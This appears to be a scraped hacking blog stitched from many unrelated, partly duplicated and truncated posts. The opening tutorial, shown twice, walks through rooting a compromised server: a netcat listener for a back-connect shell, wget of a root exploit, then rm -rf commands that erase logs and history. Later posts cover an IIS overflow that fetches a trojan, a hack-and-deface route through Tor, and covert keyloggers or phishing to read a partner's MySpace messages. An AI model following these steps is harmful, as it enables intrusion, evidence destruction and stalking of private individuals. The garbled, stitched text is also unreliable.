Wednesday 30 January 2013

Server rooting tutorial 2013 CEH

Hi guys today i will tell you how to root a server in few easy steps .

Things Required :

NetcaT
Shelled site
Local root expl0it 

Step By Step Tutorial :
First go to Run & type cmd then type : cd C:\Program Files\Netcat ( Make sure that you Netcat is saved in the following directory ) .

Now Type : nc -n -l -v -p 443 , then it would show like the image shown below .

Its time to open your shell & then connect  using back connect function in your shell ( Make sure that you are not using any Vpn or Proxy ) . Then after the connection is established you will see something as shown in the screenshot below .

So you have successfully connected ..  Then now we have to get our Local Root Exploit, like mine is  2.6.18-374 2011 . 

In this step we have to upload our exploit in a writable folder, so instead of wasting our time in finding them ..we can just change the directory to the /tmp folder which is a standard writable folder . 
Type this command to change dir to /tmp : cd /tmp
To upload your your exploit we will use wget function . 
Type : wget http://www.somesite.com/exploit.c 

Now this will upload the exploit in the tmp folder . 

 (Case 1) if you have uploaded your exploit as .c (exploit.c) the we have to compile it, so to compile it we will type the following command .
Type : gcc exploit.c -o exploit

Keep in mind in the above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit. 

(Case 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command .

Type: unzip exploit.zip 

After we have done all the above steps correctly, its time to give permission so we will type the following  command 
Type: chmod 777 exploit
Now  its time to run the Exploit, to run the exploit we will type the following command 
Type: ./exploit

Now the exploit will run & the server will be rooted  ;) .  To check weather we got root we can type 

Type: id or whoami  

Clearing Logs:

Now its our time to clearing our tracks or Logs . so below are some commands to delete the log files .

rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

Server rooting tutorial 2013

Hi guys today i will tell you how to root a server in few easy steps .

Things Required :

NetcaT
Shelled site
Local root expl0it 

Step By Step Tutorial :
First go to Run & type cmd then type : cd C:\Program Files\Netcat ( Make sure that you Netcat is saved in the following directory ) .

Now Type : nc -n -l -v -p 443 , then it would show like the image shown below .

Its time to open your shell & then connect  using back connect function in your shell ( Make sure that you are not using any Vpn or Proxy ) . Then after the connection is established you will see something as shown in the screenshot below .

So you have successfully connected ..  Then now we have to get our Local Root Exploit, like mine is  2.6.18-374 2011 . 

In this step we have to upload our exploit in a writable folder, so instead of wasting our time in finding them ..we can just change the directory to the /tmp folder which is a standard writable folder . 
Type this command to change dir to /tmp : cd /tmp
To upload your your exploit we will use wget function . 
Type : wget http://www.somesite.com/exploit.c 

Now this will upload the exploit in the tmp folder . 

 (Case 1) if you have uploaded your exploit as .c (exploit.c) the we have to compile it, so to compile it we will type the following command .
Type : gcc exploit.c -o exploit

Keep in mind in the above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit. 

(Case 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command .

Type: unzip exploit.zip 

After we have done all the above steps correctly, its time to give permission so we will type the following  command 
Type: chmod 777 exploit
Now  its time to run the Exploit, to run the exploit we will type the following command 
Type: ./exploit

Now the exploit will run & the server will be rooted  ;) .  To check weather we got root we can type 

Type: id or whoami  

Clearing Logs:

Now its our time to clearing our tracks or Logs . so below are some commands to delete the log files .

rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

Server attacking tutorial 2013 new its a text book of Certified Ethical Hackers

Hacking Tool: IISHack.exe iishack.exe overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed. c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe www.yourtarget.com is the IIS server you're hacking, 80 is the port its listening on,  www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script. "IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions. A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file type of HTR and invokes the ISM.DLL to handle the request. Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS, which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection, download an executable and then execute it. This way, any malicious code can be executed. A sample exploit can be constructed as shown below: To hack the target site and attacker's system running a web server can use iishack.exe and ncx.exe. To begin with, the ncx.exe is configured to run from the root directory. IIShack.exe is then run against the victim site. c:\>iishack.exe  80 /ncx.exe The attacker can then use netcat to evoke the command shell c:\>nc  80 He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site. IPP Buffer Overflow Countermeasures Install latest service pack from Microsoft. Remove IPP printing from IIS Server Install firewall and remove unused extensions Implement aggressive network egress filtering Use IISLockdown and URLScan utilities Regularly scan your network for vulnerable servers Without any further explanation, the first countermeasure is obviously to install the latest service packs and hotfixes. As with many IIS vulnerabilities, the IPP exploit takes advantage of a bug in an ISAPI DLL that ships with IIS 5 and is configured by default to handle requests for certain file types. This particular ISAPI filter resides in C: \WINNT\System32\msw3prt.dll and provides Windows 2000 with support for the IPP. If this functionality is not required on the Web server, the application mapping for this DLL to .printer files can be removed (and optionally deleting the DLL itself) in order to prevent the buffer overflow from being exploited. This is possible because the DLL will not be loaded into the IIS process when it starts up. In fact, most security issues are centered on the ISAPI DLL mappings, making this one of the most important countermeasure to be adopted when securing IIS. Another standard countermeasure that can be adopted here is to use a firewall and remove any extensions that are not required. Implementing aggressive network egress can help to a certain degree. With IIS, using IISLockdown and URLScan - (free utilities from Microsoft) can ensure more protection and minimize damage in case the web server is affected. Microsoft has also released a patch for the buffer overflow,  but removing the ISAPI DLL is a more proactive solution in case there are additional vulnerabilities that are yet to be found with the code. ISAPI DLL Source disclosures Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be in accessible. This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file. appending this string causes the request to be handled by ISM.DLL, which then strips the '+.htr' string and may disclose part or all of the source of the .asp file specified in the request. IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. Vulnerability exists in ISM.DLL, the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords. HTR files are scripts that allow Windows NT password services to be provided via IIS we

Develop a own server and make your own domains for your sites

Credits go to nearbygamer, who made this helpful video tutorial.

[list type=decimal]
[li]Download the Hack/Mine files above. Click here to download.[/li]
[li]Grab an unmodified minecraft_server 1.2.3 jar, no Bukkit or anything! Use Minecraft Version Changer or sumpthin' if necessary. Download Minecraft Version Changer Here.[/li]
[li]Pull open "hackslashmine__.zip" and the fresh minecraft_server.jar in your favorite archive viewer (WinRAR, 7zip, etc).[/li]
[li]Drag everything inside of "server" into the minecraft_server.jar.[/li]
[li]Drag the "lang" folder from "textures" into the minecraft_server.jar.[/li]
[li]Do NOT delete META-INF!!! I know, I know, confusing.[/li]
[li]Close the archive viewer and you're done! As with any Minecraft server on Windows, make sure you're running Java as administrator, else your server will flood with error messages! Also, don't try running any old worlds with Hack/Mine, you'll need to back them up. Enjoy Hack/Mine for SMP![/li]
[/list]

Minecraft Version Changer
http://project.adshi.net/minecraft/versionchanger/

Hack/Mine Forum

Hack Mine Wiki

Make System as server advanced for 2014 trick

Credits go to nearbygamer, who made this helpful video tutorial.

[list type=decimal]
[li]Download the Hack/Mine files above. Click here to download.[/li]
[li]Grab an unmodified minecraft_server 1.2.3 jar, no Bukkit or anything! Use Minecraft Version Changer or sumpthin' if necessary. Download Minecraft Version Changer Here.[/li]
[li]Pull open "hackslashmine__.zip" and the fresh minecraft_server.jar in your favorite archive viewer (WinRAR, 7zip, etc).[/li]
[li]Drag everything inside of "server" into the minecraft_server.jar.[/li]
[li]Drag the "lang" folder from "textures" into the minecraft_server.jar.[/li]
[li]Do NOT delete META-INF!!! I know, I know, confusing.[/li]
[li]Close the archive viewer and you're done! As with any Minecraft server on Windows, make sure you're running Java as administrator, else your server will flood with error messages! Also, don't try running any old worlds with Hack/Mine, you'll need to back them up. Enjoy Hack/Mine for SMP![/li]
[/list]

Minecraft Version Changer
http://project.adshi.net/minecraft/versionchanger/

Hack/Mine Forum

Hack Mine Wiki

Resource attaking totorial 2013 by ETHICAL HACKING

When I had the idea to expand our Blog’s topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc….) and add more hacking information, tutorials etc…. So, today I decided to make a good start by creating this post-tutorial: How to Hack a Server Everything you need to know…. Tools you need: - Backtrack (Backtrack Website) - Firefox (get it from here….) – Included in Backtrack and Ubuntu - Netcat (Included in Backtrack)   — If you are on other linux enviroments get it from here…. - iCon2PHP (Get it from here….) - A good shell (iCon2PHP Archive includes three great shells) - A good VPN or Tor (More explanation below…..) - Acunentix Web Vulnerability Scanner (Search for a cracked version at Hackforums.net) About the Tools: Backtrack – Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers. (Just a little tip: To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet) Firefox – Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking. Find more about “Hacky” addons for Firefox Here…. Netcat – Netcat is a powerful networking tool. You will need this to root the server…. iCon2PHP & Good Shells – iCon2PHP is a tool I created and you will use it if you upload the image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available. Good VPN or TOR (Proxies are good too…) – While hacking you need to be anonymous so as not to find you (even if you forget to delete the logs….). A VPN stands for Virtual Private Network and what it does is: hiding your IP, encrypting the data you send and receive to and from the Internet. A good VPN solution for Windows Maschines is ProXPN. However, with VPN connections (especially when you are under a free VPN connection) your connection speen is really slow. So, I wouldn’t recommend VPN except if you pay and get a paid account. What I would recommend is Tor. Tor can be used from its bundle: Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world so as to keep you anonymous and changing these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don’t want to pay for a Paid VPN account Apart from Tor, simple Proxies are good but I wouldn’t recommend them as much as I would for Tor.        — If I listed the above options according to their reliability :                                  1. Paid VPN Account at ProXPN 2. Tor 3. Free VPN Account at ProXPN 4. Proxy Connection Acunetix Web Vulnerability Scanner – Acunetix is (maybe the best) Vulnerability Scanner. It scans for open ports, vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows if it is a small or big vulnerability. The Consultant Edition (For unlimited websites) costs about 3000-7000$. ____________________________________________________________ Starting the Main Tutorial: So, here is the route we will follow: Find a Vulnerable Website –> Upload a c100 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks - – -  Before we begin – - - -Boot to Backtrack -Connect to your VPN or to Tor. -It would be good to read a complete guide to stay anonymous while hacking here… -Open Firefox. 1. Finding a Vulnerable Website and Information about it: Crack Acunetix (find tutorial at Hackforums.net). Open and scan the  website (use the standard profile – don’t modify anything except if you know what you are doing). For this tutorial our website will be: http://www.site.com (not very innovative, I know….) Let’s say we find a vulnerability where we can upload a remote file (our shell) and have access to the website’s files. Th

Fixing computer problems trough resource hack

This is a site run by the community - for the community. At the site, we share and contribute our computer learnings with each other. We discuss about Windows, Office, Mobile, Gaming and other computer related topics. At our forums you can post your queries and our very helpful community members will respond quickly to your queries. We organize lots of competitions from time to time and award prizes to the winners.
You will need to register at the site before posting in forums. It's absolutely free. After registering, you can get all the benefits available to our registered members, you can access our Downloads section, you can participate in contests, etc. You can post in forums in English as well as in Hindi, in fact we encourage you to use Hindi in your posts. If you have any problem with registration or login, please contact us.

Winfows 7 resouce attacking tricks 2013

=> Changing the look of RUN Dialog Box For it, u hv to edit %windir%\System32\shell32.dll file, and goto: Dialog -> 1003 -> 1033 ==> Changing the Progress Dialog Box (The box which appears while Copying/pasting/deleting stuffs) Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1020 -> 1033 ==> Changing the look of Open With box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1063 -> 1033 & Dialog -> 1070 -> 1033 ==> Changing the look of Classic Logoff dialog box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1071 -> 1033 ==> Changing the look of Drive Properties box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1080 -> 1033 & Dialog -> 1081 -> 1033 ==> Changing the look of New Logoff dialog box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1089 -> 1033 ==> Changing the look of the box, which appears when Windows ask to select application/search with web service to open the UNKNOWN filetype Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1091 -> 1033 ==> Changing the look of Autoplay box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1119 -> 1033 ==> Changing the look of Folder Customize box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1124 -> 1033 ==> Changing the look of Windows Default CD Writing Wizard Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1125 to 1138 -> 1033 ==> Changing the look of Classic Shutdown dialog box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 8226 -> 1033 ==> Changing the look of About Windows dialog box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 14352 -> 1033 ==> Changing the look of Format Drive dialog box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 28672 -> 1033 ==> Changing the look of Scandisk dialog box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 28800 -> 1033 ==> Changing the look of Desktop tab in Desktop Properties box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 29952 to 29956 -> 1033 ==> Changing the look of Folder Options box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 29959 & 29960 -> 1033 ==> Changing the look of DOS Properties box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 32768 - 32885 -> 1033 ==> Changing the look of Taskbar & Start Menu Properties box Open %windir%\Explorer.exe file, and goto: Dialog -> 6 to 1135 -> 1033 ==> Changing the look of Windows Security box, which appears when we press ctrl+alt+del keys while Welcome Screen is Disabled Open %windir%\System32\Msgina.dll file, and goto: Dialog -> 1800 -> 1033 ==> Changing the look of Shutdonw Reason UI box Open %windir%\System32\Msgina.dll file, and goto: Dialog -> 2200 -> 1033 ==> Changing the look of New Shutdown dialog box Open %windir%\System32\Msgina.dll file, and goto: Dialog -> 20100 -> 1033 ==> Changing the look of Shutdown Timer box Open %windir%\System32\WinLogon.exe file, and goto: Dialog -> 1300 -> 1033 ==> Changing the look of System Properties box Open %windir%\System32\Sysdm.cpl file, and goto: Dialog -> 41 to 4103 -> 1033 ==> Changing the look of Choose Color box Open %windir%\System32\Comdlg32.dll file, and goto: Dialog -> CHOOSECOLOR -> 1033 ==> Changing the look of Choose Font box Open %windir%\System32\Comdlg32.dll file, and goto: Dialog -> 401 & 1543 -> 1033 ==> Changing the look of Printer Properties box Open %windir%\System32\Comdlg32.dll file, and goto: Dialog -> 1538 & 1539 & 1546 -> 1033 ==> Changing the look of Open/Save Dialog box Open %windir%\System32\Comdlg32.dll file, and goto: Dialog -> 1547 * 1552 -> 1033 ==> Changing the look of Many tabs in Desktop Properties box Open %windir%\System32\ThemeUI.dll file, and goto: Dialog -> 1000 to 1017 -> 1033 ==> Changing the look of Classic Programs Menu Open %windir%\Explorer.exe file, and goto: Menu -> 204 -> 1033 ==> Changing the look of Taskbar Context Menu Open %windir%\Explorer.exe file, and goto: Menu -> 205 -> 1033 ==> Changing the Start button Text Open %windir%\Explorer.exe file, and goto: String Tabl

Hack myspace account of any users triks working

e
MySpace is usually a goldmine for juicy information and cheating messages goin on in one’s life. I personally found my girlfriend had cheated on me by discovering a myspace message in her inbox (rather, she forgot to delete her trash) – she was arguing with a guy about how he contracted an STD.. I couldn’t believe it. I got tested and thankfully I was completely clean, but I learned a valuable lesson about trust. As you can see and probably understand, knowing the truth is very important and many others agree.. even though there are others that say it is unethical. I say when it comes to your health and happiness the most ethical thing is to take care of yourself. It is very common for them to flirt, send sexual photos, or even create entirely new myspace accounts to secretly have another relationship – I have heard it all from the people that read my blog. It’s no wonder many people want to know how to hack a myspace account..
I have been experienced with hacking and computers for over 11 years so please, don’t listen to other people that know nothing. There are only 2 ways to effectively hack a myspace:
Spy Software (aka Keyloggers)
(requires money, but easy and works everytime)
Keylogging is the best method to obtain a myspace password because not only can you capture the password, but you can get ALL of their passwords, store history, and see every piece of information entered on the computer. Keylogging refers to the monitoring of key’s pressed on a keyboard, but a good spy software has many more features such as taking periodic pictures of the computer screen and chat logging. Some spy software does not require you to have physical access to the person’s computer and can be installed over the internet – this is highly popular with soldiers stationed over seas or for hacking friends.
I have tried over 20 different spy software products and there are only a few that haven’t been pressured by “privacy groups” to alert the user that they’re being monitored.
If you live with the person you want to hack, you should check out one of the best keyloggers for PC monitoring called AceSpy. You only need a few minutes with their computer to install it, or you could install this on your own computer and capture the activities of anyone that uses it. This spy software has a ton of features from IM logging, keylogging, screenshots, and everything else you would expect from spy software, but it does it with more emphasis on MySpace monitoring and password capturing. It logs information silently without any alerts and captures every key pressed on the keyboard.
If you don’t live with your target or have access to their computer, it is still possible to hack their myspace password. The only software that works (and works amazingly well) is SniperSpy. SniperSpy is a remote spy software that installs silently on your targets computer. SniperSpy gives you a module that you can send to your target (via email or instant messenger) which when ran will begin monitoring. No physical access to the target’s computer is needed as it simply installs over the internet. SniperSpy also has some amazing special features – you can view their computer screen LIVE from anywhere at anytime via SniperSpy’s website, which means you don’t need to install anything on your computer either to view all the data it collects. You will be able to view the history of chat conversations, web sites visited, and gain access to all the online accounts they log into by searching through the keylogs. It even takes image screenshots of every internet webpage they look at, so that if they are permanently deleting their sent/received myspace messages (like paranoid cheaters), you can still read the messages that have been deleted by looking at the screenshots stored by SniperSpy! This is the program I used to catch my girlfriend, and because i’ve gotten so many questions about it I recently wrote a full review of SniperSpy in which I highly recommend it.

Phishing
(free, but more difficult and technical)
Phishing is basically tricking your target into giving you their lo

Myspace account attacking trick 2013

Two teenagers were arrested here on Long Island for hacking into a female acquaintance's MySpace account. Using an old social engineering ruse, they sent the victim an email stating that another "user" had a similar MySpace page to hers and that the victim's pictures and info were on it. In their email they conveniently sent her a "link" (bogus, of course) that she could clicked on to take her to the fake MySpace login page. At that point once she entered her login information the two teens were able to capture her password data and with it they logged into her account and posted inappropriate material on her real page. Social engineering attacks are hard to combat and all the security in the world will not help when you open the door and invite the hacker in!

Facebook sent request unlimited

Hello Friends , Today I am
posting the tool "Facebook Blaster
Pro 7.1.6 Full" . It is an awesome
tool from which you can send
mass friend requests on
Facebook. Its a great tool for
website owners and advertisers
as they can send request and
messages to thousands of people
in a single click. This tool exploits
the various functional parts of
the Facebook like sending mass
friend requests, poke thousands
of people in a single click, send
alerts to thousands of people in a
single click and so on....
Facebook Blaster Pro 7.1.6 |
1.79 MB
Facebook has become the hottest
thing since MySpace and
YouTube. In fact many are
migrating over to Facebook
because MySpace has become
SpamSpace.
250 Million Members
Mass Facebook Amber Alerts
Mass Facebook Friend Requests
Mass Facebook Friend Messages
Mass Facebook Friend Pokes
Mass Facebook Wall Poster
100% CAPTCHA Bypass*
System Requirements:
Microsoft.Net Framework 2.0
Home Page - http://
www.stealthfriendbomber.com /
DOWNLOAD:
CLICK HERE
I HOPE YOU ALL WILL LIKE MY
POST ! IF YOU LIKE MY POSTS
THEN JOIN OUR HACKING
GROUP and SHARE OUR LINKS
ON TWITTER OR FACEBOOK
etc...
Enjoy..!!

Facebook friend request sent when blocked

Imagine that you are blocked from
sending Friend Requests by Facebook
for 2, 4, 7, 14 or even worse 30 days!
That would be a really serious problem
if you actually wanted to add someone
during that period. Now, you can! With
this simple trick you can send 1000's of
friend requests when when you are
blocked . There's just one part which
will be tough for you if you are going to
add unknown people. You will need the
Email address of the person you want to
add.
Head over to this Link . Here you will
find the place to add a friend through
their Email based on the different Mail
Services. But, if you 're thinking of
adding too many people then it would
be better that you create a contact file.
For the people who don't know the
easiest way to create a contact file, here
it is:
1. Open a New text document (.txt) in
Notepad.
2. Add all the email addresses
separated by a comma (' , ').
3. Now save that file with the
extension .vcf
Now, this new file is your contact file.
Upload it to Facebook and you will be
prompted to send friend request. Click
'OK' and that's it, you're done!
Simple yet effective! If you are not
blocked from sending Friend Requests
but still you get warnings like 'This
Friend Request Can't Be Sent' then you
can refer another trick which will help
you in bypassing this error here .
There's more in TechAmy which will
definitely help you in Facebook, just
head over here .

How to avoid facebook request bloking

Most of the people on Facebook are
blocked these days for adding new
friend. We already told you the reasons
behind this ban and its after effects
( Click here if you missed it). Here are
few tips to tell you how you can avoid
such bans and why you should avoid
them.
Avoid getting blocked from adding
people:
Don’t send a friend request to
every profile you visit. Facebook
Algo might ban you if you add
people with no mutual friends.
You can add strangers but avoid
sending so many requests
together. Give at least one day
gap and wait for the other person
to accept the pending request first
before you send a new one.
If someone’s not accepting your
request and kept it pending, it is
highly recommended to cancel
your friend request.
In case you are adding a
stranger, try sending a message
first, talk and make sure that he/
she will accept you request. Only
then you should send it.
Please note that sending
messages to strangers is now
considered as a spam as well.
Even if you are sending too many
messages to users who are not in
your friends list, Facebook might
ban you for adding friends.
Don’t try to add people when you
are banned. Facebook may
increase your period of ban.
Once banned, there is no need to
cancel pending friend requests,
this hardly makes a difference.
But there’s a possibility that
someone you added might report
you as unknown to Facebook.
Accept incoming friend requests
from the ‘Friend Requests’ page
i.e. https://www.facebook.com/
reqs.php not from the sender’s
profile directly.
You should always avoid such type of
bans as Facebook won’t allow you to
add persons after the ban even if you
know them. This will also ban you from
sending messages to people who are
not in your friends list. Personally even
I don’t like this feature of Facebook
where we cannot make online friend
whom we don’t know personally. But
since we’re addicted to Facebook, so
we have to accept it in the way it is. I
recommend you not to add any
stranger directly; you can always poke
someone with a mutual friend. If you
get a poke in return then there’s a
possibility of request getting accepted.

How to remove facebook freind request nlocked

Most of the people on Facebook are blocked these days for adding new friend. We already told you the reasons behind this ban and its after effects ( Click here if you missed it). Here are few tips to tell you how you can avoid such bans and why you should avoid them. Avoid getting blocked from adding people: Don’t send a friend request to every profile you visit. Facebook Algo might ban you if you add people with no mutual friends. You can add strangers but avoid sending so many requests together. Give at least one day gap and wait for the other person to accept the pending request first before you send a new one. If someone’s not accepting your request and kept it pending, it is highly recommended to cancel your friend request. In case you are adding a stranger, try sending a message first, talk and make sure that he/ she will accept you request. Only then you should send it. Please note that sending messages to strangers is now considered as a spam as well. Even if you are sending too many messages to users who are not in your friends list, Facebook might ban you for adding friends. Don’t try to add people when you are banned. Facebook may increase your period of ban. Once banned, there is no need to cancel pending friend requests, this hardly makes a difference. But there’s a possibility that someone you added might report you as unknown to Facebook. Accept incoming friend requests from the ‘Friend Requests’ page i.e. https://www.facebook.com/ reqs.php not from the sender’s profile directly. You should always avoid such type of bans as Facebook won’t allow you to add persons after the ban even if you know them. This will also ban you from sending messages to people who are not in your friends list. Personally even I don’t like this feature of Facebook where we cannot make online friend whom we don’t know personally. But since we’re addicted to Facebook, so we have to accept it in the way it is. I recommend you not to add any stranger directly; you can always poke someone with a mutual friend. If you get a poke in return then there’s a possibility of request getting accepted.

Facebook freind request sent after blocked

If you are going to add some unknown
person then you need the email address
of that person to whom you are going to
add. After you get the email address of
the personal whom you want to send
friend request either from his profile or
any other way, follow these steps.
1. Head over this LINK.
Here you will find a place to add a friends
through their Emails based on the
different Mail Services. But, if you’re
thinking of adding too many people then it
would be better that you create a contact
file.
If you don’t know the easiest way to make
contact file then follow these steps.
a) Open new text document (.txt) in
notepad.
b) Add all the email addresses separated
by a comma ( , ).
c) Now save that file with the
extension .vcf
Now this is your contact file.
2. Upload this file to Facebook. and you
will be prompted to send friend request.
NOTE : If you don’t know how to upload
contact file then follow this step.
http://www.facebook.com/?sk=ff Go to
this link! In that the last option is of ‘other
tools’ in which you will find the next
option to upload the file!
3. Click “OK”and You’re done.
Simple yet effective! Your friend request
would be sent to desired people.
If you are not blocked from sending
Friend Requests but still you get warnings
like ‘ This Friend Request Can’t Be Sent’
then you can refer another trick which will
help you in bypassing this error.

Facebook sent friend request after blocking

Facebook is a great social networking
website through which we can stay
connected with friends, relatives and
other people. But Facebook does not
allow to add strangers as your friends.
You might have gone through a stage at
least once in your Facebook
account when a message appears i.e.
your friend request is blocked for 1 day, 3
days, or even 30 days. You can not send
friend request on Facebook to anyone
whether you know him or not when you
are blocked. This is because Facebook
doesn’t let to send friend request to
unknown people and considers it as
spam and therefore temporarily disable
sending friend requests when you violate
its rules. This is generally done to secure
privacy of people and some people by
adding strangers as their friend make
misuse of that thing.
However, sometimes you may even get
blocked when you send friend request to
known people but there are a lot of friend
requesting awaiting approval pending
already. I have also gone from this same
stage, and feel helpless that we can’t
send friend request to dear friends. So
today i will tell you an easy trick with
which you can send friend request even if
you are blocked.

Tuesday 29 January 2013

Pc resorce hack tricks and tips advanced for 2014

hey all...
Today we are gonna talk  about a cool
utility called the resource hacker or
RESHACK. RESHACK is a utility using
which you can change the basic
functioning, definations and the
properties of the executable fies. This
can be best used to modify the
"Explorer" of your windows. Using this
software you can change the dialogs,
the icons, the names and many more.
All in all you get a complete access to
edit your pc.
Resource Hacker has basically been
designed to:
1. View resources in Win32 executable
files
(*.exe, *.dll, *.cpl, *.ocx) and in Win32
resource files (*.res) in both their
compiled
and decompiled formats.
2. Extract (save) resources to file in:
*.res format; as a binary; or as
decompiled
resource scripts or images.
Icons, bitmaps, cursors, menus, dialogs,
string tables, message tables,
accelerators,
Borland forms and version info
resources can
be fully decompiled into their respective
formats, whether as image files or  *.rc
text
files.
3. Modify (rename or replace) resources
in
executables. Image resources (icons,
cursors
and bitmaps) can be replaced with an
image from
a corresponding image file (*.ico, *.cur,
*.bmp),
a *.res file or even another *.exe file.
Dialogs, menus, stringtables,
accelerators and
messagetable resource scripts (and also
Borland
forms) can be edited and recompiled
using the
internal resource script editor.
Resources can also be replaced with
resources
from a *.res file as long as the
replacement
resource is of the same type and has the
same
name.
4. Add new resources to executables.
Enable a program to support multiple
languages,
or add a custom icon or bitmap
(company logo
etc) to a program's dialog.
5. Delete resources.
Most compilers add resources into
applications
which are never used by the application.
Removing these unused resources can
reduce an
application's size.
If you are using resource hacker to edit
the explorer.exe file of your Windows XP
then you can try some of these things:-
►goto "String table>37>1033" change
the string "Start" to whatever you want
to change the name of your start menu.
►You can change the string set using
this. For example if i dont like the way
the properties of start menu comes up
and i wanna change the dialogs and
explanations shown then i can change it
thrhough the Dialog>205>1033
as shown
the possibilities are endless. I suggest
my reders to get the software and go
through it. explore the whole crap and
you will not be dissapointed for sure...
DOWNLOAD LINK

System resorce attacking 2013 tutorial

==> Changing the look of RUN Dialog Box For it, u hv to edit %windir% \System32\shell32.dll file, and goto: Dialog -> 1003 -> 1033 ==> Changing the Progress Dialog Box (The box which appears while Copying/ pasting/deleting stuffs) Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1020 -> 1033 ==> Changing the look of Open With box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1063 -> 1033 & Dialog -> 1070 -> 1033 ==> Changing the look of Classic Logoff dialog box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1071 -> 1033 ==> Changing the look of Drive Properties box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1080 -> 1033 & Dialog -> 1081 -> 1033 ==> Changing the look of New Logoff dialog box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1089 -> 1033 ==> Changing the look of the box, which appears when Windows ask to select application/search with web service to open the UNKNOWN filetype Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1091 -> 1033 ==> Changing the look of Autoplay box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1119 -> 1033 ==> Changing the look of Folder Customize box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1124 -> 1033 ==> Changing the look of Windows Default CD Writing Wizard Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1125 to 1138 -> 1033 ==> Changing the look of Classic Shutdown dialog box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 8226 -> 1033 ==> Changing the look of About Windows dialog box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 14352 -> 1033 ==> Changing the look of Format Drive dialog box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 28672 -> 1033 ==> Changing the look of Scandisk dialog box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 28800 -> 1033 ==> Changing the look of Desktop tab in Desktop Properties box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 29952 to 29956 -> 1033 ==> Changing the look of Folder Options box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 29959 & 29960 -> 1033 ==> Changing the look of DOS Properties box Open %windir%\System32\shell32.dll file, and goto: Dialog -> 32768 - 32885 - > 1033 ==> Changing the look of Taskbar & Start Menu Properties box Open %windir%\Explorer.exe file, and goto: Dialog -> 6 to 1135 -> 1033 ==> Changing the look of Windows Security box, which appears when we press ctrl+alt+del keys while Welcome Screen is Disabled Open %windir%\System32\Msgina.dll file, and goto: Dialog -> 1800 -> 1033 